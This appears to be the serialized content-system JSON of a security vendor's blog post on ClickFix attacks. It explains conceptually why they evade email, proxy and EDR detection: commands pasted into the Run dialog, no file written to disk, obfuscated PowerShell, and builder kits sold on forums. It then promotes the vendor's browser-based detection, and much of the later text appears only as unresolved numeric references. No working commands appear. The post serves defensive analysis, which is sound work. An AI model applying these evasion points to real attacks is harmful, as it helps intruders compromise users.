",[],{},{"nodeType":312,"data":21323,"content":21327},{"target":21324},{"sys":21325},{"id":21326,"type":317,"linkType":318},"1SG52ta1hcBZ3gYDsSJvsm",[],{"nodeType":231,"data":21329,"content":21330},{},[],{"nodeType":169,"data":21332,"content":21333},{},[21334],{"nodeType":173,"value":21335,"marks":21336,"data":21338},"Why are ClickFix attacks so effective?",[21337],{"type":370},{},{"nodeType":178,"data":21340,"content":21341},{},[21342],{"nodeType":173,"value":21343,"marks":21344,"data":21345},"To understand the effectiveness of ClickFix-style attacks, we need to look more closely at the mechanisms that security teams have at their disposal to counter these attacks. ",[],{},{"nodeType":235,"data":21347,"content":21348},{},[21349],{"nodeType":173,"value":21350,"marks":21351,"data":21353},"Detection challenges during delivery",[21352],{"type":370},{},{"nodeType":178,"data":21355,"content":21356},{},[21357,21361,21369],{"nodeType":173,"value":21358,"marks":21359,"data":21360},"We’ve written extensively about ",[],{},{"nodeType":186,"data":21362,"content":21363},{"uri":8987},[21364],{"nodeType":173,"value":21365,"marks":21366,"data":21368},"the evolution in phishing techniques and tooling",[21367],{"type":194},{},{"nodeType":173,"value":21370,"marks":21371,"data":21372},", and what this means for the reliability of traditional detections at the network and endpoint layer. ",[],{},{"nodeType":178,"data":21374,"content":21375},{},[21376],{"nodeType":173,"value":21377,"marks":21378,"data":21379},"The latest generation of phishing pages are dynamically obfuscating the code that loads the web page, implementing custom bot protection (e.g. CAPTCHA or Cloudflare Turnstile), using runtime anti-analysis features, and using legitimate SaaS and cloud services to host and deliver phishing links to cover their tracks.",[],{},{"nodeType":178,"data":21381,"content":21382},{},[21383],{"nodeType":173,"value":21384,"marks":21385,"data":21386},"This means that traditional anti-phishing tools at the email and network layer are struggling to keep up, with many attacks evading email-based detections (or bypassing email altogether). At the same time, proxy-based solutions now see a garbled mess of JavaScript code without the necessary context of what is actually happening in the browser to be able to piece it together effectively. Even if they don’t realize it, this means many organizations are now relying solely on blocking known-bad sites and hosts — a wildly ineffective solution in 2025 with the rate that attackers refresh and rotate their phishing infrastructure. ",[],{},{"nodeType":178,"data":21388,"content":21389},{},[21390],{"nodeType":173,"value":21391,"marks":21392,"data":21393},"In addition to the fact that ClickFix page styles and content can vary significantly, this means that detecting ClickFix delivery using traditional tooling is highly unreliable. ",[],{},{"nodeType":235,"data":21395,"content":21396},{},[21397],{"nodeType":173,"value":21398,"marks":21399,"data":21401},"Detection challenges during execution",[21400],{"type":370},{},{"nodeType":178,"data":21403,"content":21404},{},[21405],{"nodeType":173,"value":21406,"marks":21407,"data":21408},"Most of the detection heavy lifting is being done at the endpoint, looking for user-level code execution and malware running on a device. ",[],{},{"nodeType":178,"data":21410,"content":21411},{},[21412],{"nodeType":173,"value":21413,"marks":21414,"data":21415},"However, the number of ClickFix-related headlines in the news would indicate that endpoint controls are being routinely bypassed, or perhaps evaded altogether by targeting personal or BYOD devices. ",[],{},{"nodeType":312,"data":21417,"content":21421},{"target":21418},{"sys":21419},{"id":21420,"type":317,"linkType":318},"pocty4OhER5EXr8BDwdzo",[],{"nodeType":178,"data":21423,"content":21424},{},[21425],{"nodeType":173,"value":21426,"marks":21427,"data":21428},"There are a number of reasons that endpoint-level ClickFix detections can be bypassed:",[],{},{"nodeType":250,"data":21430,"content":21431},{},[21432,21442,21452],{"nodeType":254,"data":21433,"content":21434},{},[21435],{"nodeType":178,"data":21436,"content":21437},{},[21438],{"nodeType":173,"value":21439,"marks":21440,"data":21441},"The step of downloading a file from the web is bypassed altogether. In a ClickFix/FileFix attack, the initial “dropper” is essentially a command string provided by the attacker and executed by legitimate system utilities. There is often no new executable file written to disk when the user runs the command. The final payload may be loaded directly into memory or injected into trusted programs (using living-off-the-land techniques). Without a file to quarantine, there's no \"Mark of the Web\" to make it appear suspicious. ",[],{},{"nodeType":254,"data":21443,"content":21444},{},[21445],{"nodeType":178,"data":21446,"content":21447},{},[21448],{"nodeType":173,"value":21449,"marks":21450,"data":21451},"From the EDR’s point of view, a trusted parent process is launching a script – which might not immediately be judged as malicious, especially if the command is obfuscated or uses allowed system functions. Since the action is initiated by the user, it blends in with normal user-driven administration tasks. ",[],{},{"nodeType":254,"data":21453,"content":21454},{},[21455],{"nodeType":178,"data":21456,"content":21457},{},[21458],{"nodeType":173,"value":21459,"marks":21460,"data":21461},"The PowerShell commands themselves might be obfuscated or broken into stages to avoid easy detection by heuristic rules. EDR telemetry might record that a PowerShell process ran, but without a known bad signature or a clear policy violation, it may not flag it immediately. ",[],{},{"nodeType":312,"data":21463,"content":21467},{"target":21464},{"sys":21465},{"id":21466,"type":317,"linkType":318},"6djGsqBFTHlLLITpTK7IMk",[],{"nodeType":235,"data":21469,"content":21470},{},[21471],{"nodeType":173,"value":21472,"marks":21473,"data":21475},"Accessing ClickFix-style capabilities is easier than ever",[21474],{"type":370},{},{"nodeType":178,"data":21477,"content":21478},{},[21479,21483,21491],{"nodeType":173,"value":21480,"marks":21481,"data":21482},"This capability is increasingly available to all levels of threat actor, with ",[],{},{"nodeType":186,"data":21484,"content":21485},{"uri":21119},[21486],{"nodeType":173,"value":21487,"marks":21488,"data":21490},"off-the-shelf options available",[21489],{"type":194},{},{"nodeType":173,"value":21492,"marks":21493,"data":21494}," in the form of ClickFix builders (also called “Win + R”) on popular hacker forums since late 2024. ",[],{},{"nodeType":178,"data":21496,"content":21497},{},[21498],{"nodeType":173,"value":21499,"marks":21500,"data":21501},"Attackers are bundling ClickFix builders into their existing kits to:",[],{},{"nodeType":250,"data":21503,"content":21504},{},[21505,21515],{"nodeType":254,"data":21506,"content":21507},{},[21508],{"nodeType":178,"data":21509,"content":21510},{},[21511],{"nodeType":173,"value":21512,"marks":21513,"data":21514},"Use pre-canned landing pages with various lures including Cloudflare. ",[],{},{"nodeType":254,"data":21516,"content":21517},{},[21518],{"nodeType":178,"data":21519,"content":21520},{},[21521],{"nodeType":173,"value":21522,"marks":21523,"data":21524},"Offer construction of malicious commands that users will paste into the Windows Run dialog. ",[],{},{"nodeType":178,"data":21526,"content":21527},{},[21528],{"nodeType":173,"value":21529,"marks":21530,"data":21531},"These kits claim to guarantee antivirus and web protection bypass (some even promise that they can bypass Microsoft Defender SmartScreen), as well as payload persistence. The cost of subscription to such a service might be between US$200 to US$1,500 per month. ",[],{},{"nodeType":178,"data":21533,"content":21534},{},[21535],{"nodeType":173,"value":21536,"marks":21537,"data":21538},"In short, these capabilities are increasingly accessible to the general population of hackers, and it is increasingly in the interests of malware developers to offer premium hacker tools designed to bypass current detections. ",[],{},{"nodeType":312,"data":21540,"content":21544},{"target":21541},{"sys":21542},{"id":21543,"type":317,"linkType":318},"5hkRsOBZCOABAShCo8RjJg",[],{"nodeType":178,"data":21546,"content":21547},{},[21548],{"nodeType":173,"value":21549,"marks":21550,"data":21551},"In any case, relying on just-in-time detection at the point of execution is increasingly unreliable and will always be at the mercy of the cat-and-mouse game between attackers and defenders. Organizations employing custom detections looking for specific malware behavior are likely to have better success than those relying on out-of-the-box EDR configs, but this requires continual maintenance to be effective. ",[],{},{"nodeType":231,"data":21553,"content":21554},{},[],{"nodeType":169,"data":21556,"content":21557},{},[21558],{"nodeType":173,"value":21559,"marks":21560,"data":21562},"Solving ClickFix detection in the browser with Push",[21561],{"type":370},{},{"nodeType":178,"data":21564,"content":21565},{},[21566,21569,21573],{"nodeType":173,"value":21216,"marks":21567,"data":21568},[],{},{"nodeType":173,"value":20995,"marks":21570,"data":21572},[21571],{"type":370},{},{"nodeType":173,"value":21574,"marks":21575,"data":21576},", tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking, with a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.",[],{},{"nodeType":178,"data":21578,"content":21579},{},[21580,21584,21592],{"nodeType":173,"value":21581,"marks":21582,"data":21583},"A key part of our design philosophy is to find ways to universally detect attacker TTPs by analyzing generic attacker actions that can’t be avoided by the attacker. One of our best prior examples of this is with our ",[],{},{"nodeType":186,"data":21585,"content":21586},{"uri":9099},[21587],{"nodeType":173,"value":21588,"marks":21589,"data":21591},"password protection feature",[21590],{"type":194},{},{"nodeType":173,"value":21593,"marks":21594,"data":21595},", which detects and blocks phishing attacks by triggering when a user attempts to enter a password that belongs to one domain on a different domain. ",[],{},{"nodeType":178,"data":21597,"content":21598},{},[21599],{"nodeType":173,"value":21600,"marks":21601,"data":21602},"In the case of ClickFix, every attack involves copying a malicious script from a page — a behavior the attacker can’t avoid.",[],{},{"nodeType":178,"data":21604,"content":21605},{},[21606],{"nodeType":173,"value":21607,"marks":21608,"data":21609},"Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity. ",[],{},{"nodeType":178,"data":21611,"content":21612},{},[21613],{"nodeType":173,"value":21614,"marks":21615,"data":21616},"Check out the video below to see Push in action. ",[],{},{"nodeType":312,"data":21618,"content":21621},{"target":21619},{"sys":21620},{"id":21021,"type":317,"linkType":318},[],{"nodeType":235,"data":21623,"content":21624},{},[21625],{"nodeType":173,"value":21626,"marks":21627,"data":21629},"Enable ClickFix detection in just a few clicks",[21628],{"type":370},{},{"nodeType":178,"data":21631,"content":21632},{},[21633,21637,21645],{"nodeType":173,"value":21634,"marks":21635,"data":21636},"Check out the ",[],{},{"nodeType":186,"data":21638,"content":21640},{"uri":21639},"https://pushsecurity.com/help/10141/#start",[21641],{"nodeType":173,"value":21642,"marks":21643,"data":21644},"help article",[],{},{"nodeType":173,"value":21646,"marks":21647,"data":21648}," for step-by-step instructions on how to enable the control. ",[],{},{"nodeType":231,"data":21650,"content":21651},{},[],{"nodeType":169,"data":21653,"content":21654},{},[21655],{"nodeType":173,"value":2824,"marks":21656,"data":21658},[21657],{"type":370},{},{"nodeType":178,"data":21660,"content":21661},{},[21662],{"nodeType":173,"value":21663,"marks":21664,"data":21665},"Push provides last mile protection against browser-based attacks, adding a net-new layer of technical protection in the browser. ",[],{},{"nodeType":178,"data":21667,"content":21668},{},[21669],{"nodeType":173,"value":21670,"marks":21671,"data":21672},"Right now, most organizations are left relying on user awareness. Faced with increasingly novel attack types, encountered all over the internet, users are being caught unawares — further reducing the efficacy of an already fragile control. ",[],{},{"nodeType":178,"data":21674,"content":21675},{},[21676],{"nodeType":173,"value":21677,"marks":21678,"data":21679},"By seeing what the user sees in the browser, as they see it, as well as monitoring for risky behaviors, Push provides a strong backstop against an ever-expanding landscape of browser-based exploits. ",[],{},{"nodeType":178,"data":21681,"content":21682},{},[21683],{"nodeType":173,"value":21684,"marks":21685,"data":21686},"Push’s browser-based security platform provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your identity attack surface.",[],{},{"nodeType":178,"data":21688,"content":21689},{},[21690,21693,21700,21703,21710],{"nodeType":173,"value":1451,"marks":21691,"data":21692},[],{},{"nodeType":186,"data":21694,"content":21695},{"uri":1456},[21696],{"nodeType":173,"value":1459,"marks":21697,"data":21699},[21698],{"type":194},{},{"nodeType":173,"value":1464,"marks":21701,"data":21702},[],{},{"nodeType":186,"data":21704,"content":21705},{"uri":1469},[21706],{"nodeType":173,"value":1472,"marks":21707,"data":21709},[21708],{"type":194},{},{"nodeType":173,"value":1477,"marks":21711,"data":21712},[],{},{"nodeType":312,"data":21714,"content":21717},{"target":21715},{"sys":21716},{"id":21466,"type":317,"linkType":318},[],{"nodeType":178,"data":21719,"content":21720},{},[21721],{"nodeType":173,"value":37,"marks":21722,"data":21723},[],{},"Push now detects malware delivery in the browser, supporting a layered defense against endpoint attacks. ","2025-10-09T00:00:00.000Z",{"items":21727},[21728,21730],{"sys":21729,"name":509},{"id":508},{"sys":21731,"name":505},{"id":504},{"items":21733},[21734],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":21735},{"url":1496},{"items":21737},[21738],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":21739},{"url":13981},{"json":21741,"links":22627},{"nodeType":165,"data":21742,"content":21743},{},[21744,21749,21755,21761,21768,21781,21786,21789,21796,21802,21808,21814,21820,21826,21832,21838,21844,21849,21854,21860,21865,21871,21877,21882,21887,21892,21897,21913,21923,21929,21934,21940,21946,21976,21982,21989,21995,22000,22006,22011,22017,22033,22039,22042,22049,22055,22138,22144,22149,22152,22159,22165,22171,22177,22213,22216,22223,22239,22245,22252,22444,22451,22481,22488,22495,22501,22508,22514,22521,22531,22538,22544,22551,22561,22568,22575,22582,22589,22596,22603,22613,22620],{"nodeType":312,"data":21745,"content":21748},{"target":21746},{"sys":21747},{"id":12971,"type":317,"linkType":318},[],{"nodeType":178,"data":21750,"content":21751},{},[21752],{"nodeType":173,"value":12977,"marks":21753,"data":21754},[],{},{"nodeType":178,"data":21756,"content":21757},{},[21758],{"nodeType":173,"value":12984,"marks":21759,"data":21760},[],{},{"nodeType":178,"data":21762,"content":21763},{},[21764],{"nodeType":173,"value":12991,"marks":21765,"data":21767},[21766],{"type":370},{},{"nodeType":178,"data":21769,"content":21770},{},[21771,21774,21778],{"nodeType":173,"value":12999,"marks":21772,"data":21773},[],{},{"nodeType":173,"value":13003,"marks":21775,"data":21777},[21776],{"type":370},{},{"nodeType":173,"value":13008,"marks":21779,"data":21780},[],{},{"nodeType":312,"data":21782,"content":21785},{"target":21783},{"sys":21784},{"id":13015,"type":317,"linkType":318},[],{"nodeType":231,"data":21787,"content":21788},{},[],{"nodeType":169,"data":21790,"content":21791},{},[21792],{"nodeType":173,"value":13024,"marks":21793,"data":21795},[21794],{"type":370},{},{"nodeType":178,"data":21797,"content":21798},{},[21799],{"nodeType":173,"value":13032,"marks":21800,"data":21801},[],{},{"nodeType":178,"data":21803,"content":21804},{},[21805],{"nodeType":173,"value":13039,"marks":21806,"data":21807},[],{},{"nodeType":235,"data":21809,"content":21810},{},[21811],{"nodeType":173,"value":13046,"marks":21812,"data":21813},[],{},{"nodeType":178,"data":21815,"content":21816},{},[21817],{"nodeType":173,"value":13053,"marks":21818,"data":21819},[],{},{"nodeType":178,"data":21821,"content":21822},{},[21823],{"nodeType":173,"value":13060,"marks":21824,"data":21825},[],{},{"nodeType":178,"data":21827,"content":21828},{},[21829],{"nodeType":173,"value":13067,"marks":21830,"data":21831},[],{},{"nodeType":178,"data":21833,"content":21834},{},[21835],{"nodeType":173,"value":13074,"marks":21836,"data":21837},[],{},{"nodeType":178,"data":21839,"content":21840},{},[21841],{"nodeType":173,"value":13081,"marks":21842,"data":21843},[],{},{"nodeType":312,"data":21845,"content":21848},{"target":21846},{"sys":21847},{"id":13088,"type":317,"linkType":318},[],{"nodeType":312,"data":21850,"content":21853},{"target":21851},{"sys":21852},{"id":13094,"type":317,"linkType":318},[],{"nodeType":178,"data":21855,"content":21856},{},[21857],{"nodeType":173,"value":13100,"marks":21858,"data":21859},[],{},{"nodeType":312,"data":21861,"content":21864},{"target":21862},{"sys":21863},{"id":13107,"type":317,"linkType":318},[],{"nodeType":235,"data":21866,"content":21867},{},[21868],{"nodeType":173,"value":13113,"marks":21869,"data":21870},[],{},{"nodeType":178,"data":21872,"content":21873},{},[21874],{"nodeType":173,"value":13120,"marks":21875,"data":21876},[],{},{"nodeType":312,"data":21878,"content":21881},{"target":21879},{"sys":21880},{"id":13127,"type":317,"linkType":318},[],{"nodeType":312,"data":21883,"content":21886},{"target":21884},{"sys":21885},{"id":13133,"type":317,"linkType":318},[],{"nodeType":312,"data":21888,"content":21891},{"target":21889},{"sys":21890},{"id":13139,"type":317,"linkType":318},[],{"nodeType":312,"data":21893,"content":21896},{"target":21894},{"sys":21895},{"id":13145,"type":317,"linkType":318},[],{"nodeType":178,"data":21898,"content":21899},{},[21900,21903,21910],{"nodeType":173,"value":13151,"marks":21901,"data":21902},[],{},{"nodeType":186,"data":21904,"content":21905},{"uri":13156},[21906],{"nodeType":173,"value":13159,"marks":21907,"data":21909},[21908],{"type":194},{},{"nodeType":173,"value":13164,"marks":21911,"data":21912},[],{},{"nodeType":178,"data":21914,"content":21915},{},[21916,21920],{"nodeType":173,"value":13171,"marks":21917,"data":21919},[21918],{"type":370},{},{"nodeType":173,"value":13176,"marks":21921,"data":21922},[],{},{"nodeType":178,"data":21924,"content":21925},{},[21926],{"nodeType":173,"value":13183,"marks":21927,"data":21928},[],{},{"nodeType":312,"data":21930,"content":21933},{"target":21931},{"sys":21932},{"id":13190,"type":317,"linkType":318},[],{"nodeType":235,"data":21935,"content":21936},{},[21937],{"nodeType":173,"value":13196,"marks":21938,"data":21939},[],{},{"nodeType":178,"data":21941,"content":21942},{},[21943],{"nodeType":173,"value":13203,"marks":21944,"data":21945},[],{},{"nodeType":250,"data":21947,"content":21948},{},[21949,21958,21967],{"nodeType":254,"data":21950,"content":21951},{},[21952],{"nodeType":178,"data":21953,"content":21954},{},[21955],{"nodeType":173,"value":13216,"marks":21956,"data":21957},[],{},{"nodeType":254,"data":21959,"content":21960},{},[21961],{"nodeType":178,"data":21962,"content":21963},{},[21964],{"nodeType":173,"value":13226,"marks":21965,"data":21966},[],{},{"nodeType":254,"data":21968,"content":21969},{},[21970],{"nodeType":178,"data":21971,"content":21972},{},[21973],{"nodeType":173,"value":13236,"marks":21974,"data":21975},[],{},{"nodeType":178,"data":21977,"content":21978},{},[21979],{"nodeType":173,"value":13243,"marks":21980,"data":21981},[],{},{"nodeType":178,"data":21983,"content":21984},{},[21985],{"nodeType":173,"value":13250,"marks":21986,"data":21988},[21987],{"type":370},{},{"nodeType":178,"data":21990,"content":21991},{},[21992],{"nodeType":173,"value":13258,"marks":21993,"data":21994},[],{},{"nodeType":312,"data":21996,"content":21999},{"target":21997},{"sys":21998},{"id":13265,"type":317,"linkType":318},[],{"nodeType":178,"data":22001,"content":22002},{},[22003],{"nodeType":173,"value":13271,"marks":22004,"data":22005},[],{},{"nodeType":312,"data":22007,"content":22010},{"target":22008},{"sys":22009},{"id":13278,"type":317,"linkType":318},[],{"nodeType":235,"data":22012,"content":22013},{},[22014],{"nodeType":173,"value":13284,"marks":22015,"data":22016},[],{},{"nodeType":178,"data":22018,"content":22019},{},[22020,22023,22030],{"nodeType":173,"value":13291,"marks":22021,"data":22022},[],{},{"nodeType":186,"data":22024,"content":22025},{"uri":6820},[22026],{"nodeType":173,"value":13298,"marks":22027,"data":22029},[22028],{"type":194},{},{"nodeType":173,"value":197,"marks":22031,"data":22032},[],{},{"nodeType":178,"data":22034,"content":22035},{},[22036],{"nodeType":173,"value":13309,"marks":22037,"data":22038},[],{},{"nodeType":231,"data":22040,"content":22041},{},[],{"nodeType":169,"data":22043,"content":22044},{},[22045],{"nodeType":173,"value":13319,"marks":22046,"data":22048},[22047],{"type":370},{},{"nodeType":178,"data":22050,"content":22051},{},[22052],{"nodeType":173,"value":13327,"marks":22053,"data":22054},[],{},{"nodeType":250,"data":22056,"content":22057},{},[22058,22078,22098,22118],{"nodeType":254,"data":22059,"content":22060},{},[22061],{"nodeType":178,"data":22062,"content":22063},{},[22064,22067,22075],{"nodeType":173,"value":37,"marks":22065,"data":22066},[],{},{"nodeType":186,"data":22068,"content":22069},{"uri":13344},[22070],{"nodeType":173,"value":13347,"marks":22071,"data":22074},[22072,22073],{"type":194},{"type":370},{},{"nodeType":173,"value":13353,"marks":22076,"data":22077},[],{},{"nodeType":254,"data":22079,"content":22080},{},[22081],{"nodeType":178,"data":22082,"content":22083},{},[22084,22087,22095],{"nodeType":173,"value":37,"marks":22085,"data":22086},[],{},{"nodeType":186,"data":22088,"content":22089},{"uri":13367},[22090],{"nodeType":173,"value":13370,"marks":22091,"data":22094},[22092,22093],{"type":194},{"type":370},{},{"nodeType":173,"value":13376,"marks":22096,"data":22097},[],{},{"nodeType":254,"data":22099,"content":22100},{},[22101],{"nodeType":178,"data":22102,"content":22103},{},[22104,22107,22115],{"nodeType":173,"value":37,"marks":22105,"data":22106},[],{},{"nodeType":186,"data":22108,"content":22109},{"uri":13390},[22110],{"nodeType":173,"value":13393,"marks":22111,"data":22114},[22112,22113],{"type":194},{"type":370},{},{"nodeType":173,"value":13399,"marks":22116,"data":22117},[],{},{"nodeType":254,"data":22119,"content":22120},{},[22121],{"nodeType":178,"data":22122,"content":22123},{},[22124,22127,22135],{"nodeType":173,"value":37,"marks":22125,"data":22126},[],{},{"nodeType":186,"data":22128,"content":22129},{"uri":13413},[22130],{"nodeType":173,"value":13416,"marks":22131,"data":22134},[22132,22133],{"type":194},{"type":370},{},{"nodeType":173,"value":13422,"marks":22136,"data":22137},[],{},{"nodeType":178,"data":22139,"content":22140},{},[22141],{"nodeType":173,"value":13429,"marks":22142,"data":22143},[],{},{"nodeType":312,"data":22145,"content":22148},{"target":22146},{"sys":22147},{"id":13436,"type":317,"linkType":318},[],{"nodeType":231,"data":22150,"content":22151},{},[],{"nodeType":235,"data":22153,"content":22154},{},[22155],{"nodeType":173,"value":13445,"marks":22156,"data":22158},[22157],{"type":370},{},{"nodeType":178,"data":22160,"content":22161},{},[22162],{"nodeType":173,"value":13453,"marks":22163,"data":22164},[],{},{"nodeType":178,"data":22166,"content":22167},{},[22168],{"nodeType":173,"value":13460,"marks":22169,"data":22170},[],{},{"nodeType":178,"data":22172,"content":22173},{},[22174],{"nodeType":173,"value":13467,"marks":22175,"data":22176},[],{},{"nodeType":178,"data":22178,"content":22179},{},[22180,22183,22190,22193,22200,22203,22210],{"nodeType":173,"value":13474,"marks":22181,"data":22182},[],{},{"nodeType":186,"data":22184,"content":22185},{"uri":1456},[22186],{"nodeType":173,"value":1459,"marks":22187,"data":22189},[22188],{"type":194},{},{"nodeType":173,"value":2936,"marks":22191,"data":22192},[],{},{"nodeType":186,"data":22194,"content":22195},{"uri":3941},[22196],{"nodeType":173,"value":3944,"marks":22197,"data":22199},[22198],{"type":194},{},{"nodeType":173,"value":3949,"marks":22201,"data":22202},[],{},{"nodeType":186,"data":22204,"content":22205},{"uri":1469},[22206],{"nodeType":173,"value":1472,"marks":22207,"data":22209},[22208],{"type":194},{},{"nodeType":173,"value":1477,"marks":22211,"data":22212},[],{},{"nodeType":231,"data":22214,"content":22215},{},[],{"nodeType":169,"data":22217,"content":22218},{},[22219],{"nodeType":173,"value":8406,"marks":22220,"data":22222},[22221],{"type":370},{},{"nodeType":178,"data":22224,"content":22225},{},[22226,22229,22236],{"nodeType":173,"value":13521,"marks":22227,"data":22228},[],{},{"nodeType":186,"data":22230,"content":22231},{"uri":8419},[22232],{"nodeType":173,"value":8422,"marks":22233,"data":22235},[22234],{"type":194},{},{"nodeType":173,"value":13532,"marks":22237,"data":22238},[],{},{"nodeType":178,"data":22240,"content":22241},{},[22242],{"nodeType":173,"value":13539,"marks":22243,"data":22244},[],{},{"nodeType":178,"data":22246,"content":22247},{},[22248],{"nodeType":173,"value":13546,"marks":22249,"data":22251},[22250],{"type":370},{},{"nodeType":250,"data":22253,"content":22254},{},[22255,22264,22273,22282,22291,22300,22309,22318,22327,22336,22345,22354,22363,22372,22381,22390,22399,22408,22417,22426,22435],{"nodeType":254,"data":22256,"content":22257},{},[22258],{"nodeType":178,"data":22259,"content":22260},{},[22261],{"nodeType":173,"value":13560,"marks":22262,"data":22263},[],{},{"nodeType":254,"data":22265,"content":22266},{},[22267],{"nodeType":178,"data":22268,"content":22269},{},[22270],{"nodeType":173,"value":13570,"marks":22271,"data":22272},[],{},{"nodeType":254,"data":22274,"content":22275},{},[22276],{"nodeType":178,"data":22277,"content":22278},{},[22279],{"nodeType":173,"value":13580,"marks":22280,"data":22281},[],{},{"nodeType":254,"data":22283,"content":22284},{},[22285],{"nodeType":178,"data":22286,"content":22287},{},[22288],{"nodeType":173,"value":13590,"marks":22289,"data":22290},[],{},{"nodeType":254,"data":22292,"content":22293},{},[22294],{"nodeType":178,"data":22295,"content":22296},{},[22297],{"nodeType":173,"value":13600,"marks":22298,"data":22299},[],{},{"nodeType":254,"data":22301,"content":22302},{},[22303],{"nodeType":178,"data":22304,"content":22305},{},[22306],{"nodeType":173,"value":13590,"marks":22307,"data":22308},[],{},{"nodeType":254,"data":22310,"content":22311},{},[22312],{"nodeType":178,"data":22313,"content":22314},{},[22315],{"nodeType":173,"value":13619,"marks":22316,"data":22317},[],{},{"nodeType":254,"data":22319,"content":22320},{},[22321],{"nodeType":178,"data":22322,"content":22323},{},[22324],{"nodeType":173,"value":13629,"marks":22325,"data":22326},[],{},{"nodeType":254,"data":22328,"content":22329},{},[22330],{"nodeType":178,"data":22331,"content":22332},{},[22333],{"nodeType":173,"value":13570,"marks":22334,"data":22335},[],{},{"nodeType":254,"data":22337,"content":22338},{},[22339],{"nodeType":178,"data":22340,"content":22341},{},[22342],{"nodeType":173,"value":13648,"marks":22343,"data":22344},[],{},{"nodeType":254,"data":22346,"content":22347},{},[22348],{"nodeType":178,"data":22349,"content":22350},{},[22351],{"nodeType":173,"value":13658,"marks":22352,"data":22353},[],{},{"nodeType":254,"data":22355,"content":22356},{},[22357],{"nodeType":178,"data":22358,"content":22359},{},[22360],{"nodeType":173,"value":13668,"marks":22361,"data":22362},[],{},{"nodeType":254,"data":22364,"content":22365},{},[22366],{"nodeType":178,"data":22367,"content":22368},{},[22369],{"nodeType":173,"value":13678,"marks":22370,"data":22371},[],{},{"nodeType":254,"data":22373,"content":22374},{},[22375],{"nodeType":178,"data":22376,"content":22377},{},[22378],{"nodeType":173,"value":13688,"marks":22379,"data":22380},[],{},{"nodeType":254,"data":22382,"content":22383},{},[22384],{"nodeType":178,"data":22385,"content":22386},{},[22387],{"nodeType":173,"value":13698,"marks":22388,"data":22389},[],{},{"nodeType":254,"data":22391,"content":22392},{},[22393],{"nodeType":178,"data":22394,"content":22395},{},[22396],{"nodeType":173,"value":13708,"marks":22397,"data":22398},[],{},{"nodeType":254,"data":22400,"content":22401},{},[22402],{"nodeType":178,"data":22403,"content":22404},{},[22405],{"nodeType":173,"value":13629,"marks":22406,"data":22407},[],{},{"nodeType":254,"data":22409,"content":22410},{},[22411],{"nodeType":178,"data":22412,"content":22413},{},[22414],{"nodeType":173,"value":13727,"marks":22415,"data":22416},[],{},{"nodeType":254,"data":22418,"content":22419},{},[22420],{"nodeType":178,"data":22421,"content":22422},{},[22423],{"nodeType":173,"value":13737,"marks":22424,"data":22425},[],{},{"nodeType":254,"data":22427,"content":22428},{},[22429],{"nodeType":178,"data":22430,"content":22431},{},[22432],{"nodeType":173,"value":13747,"marks":22433,"data":22434},[],{},{"nodeType":254,"data":22436,"content":22437},{},[22438],{"nodeType":178,"data":22439,"content":22440},{},[22441],{"nodeType":173,"value":13757,"marks":22442,"data":22443},[],{},{"nodeType":178,"data":22445,"content":22446},{},[22447],{"nodeType":173,"value":13764,"marks":22448,"data":22450},[22449],{"type":370},{},{"nodeType":250,"data":22452,"content":22453},{},[22454,22463,22472],{"nodeType":254,"data":22455,"content":22456},{},[22457],{"nodeType":178,"data":22458,"content":22459},{},[22460],{"nodeType":173,"value":13778,"marks":22461,"data":22462},[],{},{"nodeType":254,"data":22464,"content":22465},{},[22466],{"nodeType":178,"data":22467,"content":22468},{},[22469],{"nodeType":173,"value":13788,"marks":22470,"data":22471},[],{},{"nodeType":254,"data":22473,"content":22474},{},[22475],{"nodeType":178,"data":22476,"content":22477},{},[22478],{"nodeType":173,"value":13798,"marks":22479,"data":22480},[],{},{"nodeType":178,"data":22482,"content":22483},{},[22484],{"nodeType":173,"value":13805,"marks":22485,"data":22487},[22486],{"type":370},{},{"nodeType":178,"data":22489,"content":22490},{},[22491],{"nodeType":173,"value":13813,"marks":22492,"data":22494},[22493],{"type":13816},{},{"nodeType":178,"data":22496,"content":22497},{},[22498],{"nodeType":173,"value":37,"marks":22499,"data":22500},[],{},{"nodeType":178,"data":22502,"content":22503},{},[22504],{"nodeType":173,"value":13828,"marks":22505,"data":22507},[22506],{"type":13816},{},{"nodeType":178,"data":22509,"content":22510},{},[22511],{"nodeType":173,"value":13836,"marks":22512,"data":22513},[],{},{"nodeType":178,"data":22515,"content":22516},{},[22517],{"nodeType":173,"value":13843,"marks":22518,"data":22520},[22519],{"type":13816},{},{"nodeType":178,"data":22522,"content":22523},{},[22524,22527],{"nodeType":173,"value":13836,"marks":22525,"data":22526},[],{},{"nodeType":173,"value":13854,"marks":22528,"data":22530},[22529],{"type":370},{},{"nodeType":178,"data":22532,"content":22533},{},[22534],{"nodeType":173,"value":13862,"marks":22535,"data":22537},[22536],{"type":13816},{},{"nodeType":178,"data":22539,"content":22540},{},[22541],{"nodeType":173,"value":37,"marks":22542,"data":22543},[],{},{"nodeType":178,"data":22545,"content":22546},{},[22547],{"nodeType":173,"value":13876,"marks":22548,"data":22550},[22549],{"type":13816},{},{"nodeType":178,"data":22552,"content":22553},{},[22554,22557],{"nodeType":173,"value":13836,"marks":22555,"data":22556},[],{},{"nodeType":173,"value":13887,"marks":22558,"data":22560},[22559],{"type":370},{},{"nodeType":178,"data":22562,"content":22563},{},[22564],{"nodeType":173,"value":13895,"marks":22565,"data":22567},[22566],{"type":13816},{},{"nodeType":178,"data":22569,"content":22570},{},[22571],{"nodeType":173,"value":13903,"marks":22572,"data":22574},[22573],{"type":13816},{},{"nodeType":178,"data":22576,"content":22577},{},[22578],{"nodeType":173,"value":13911,"marks":22579,"data":22581},[22580],{"type":13816},{},{"nodeType":178,"data":22583,"content":22584},{},[22585],{"nodeType":173,"value":13919,"marks":22586,"data":22588},[22587],{"type":13816},{},{"nodeType":178,"data":22590,"content":22591},{},[22592],{"nodeType":173,"value":1260,"marks":22593,"data":22595},[22594],{"type":13816},{},{"nodeType":178,"data":22597,"content":22598},{},[22599],{"nodeType":173,"value":13934,"marks":22600,"data":22602},[22601],{"type":1381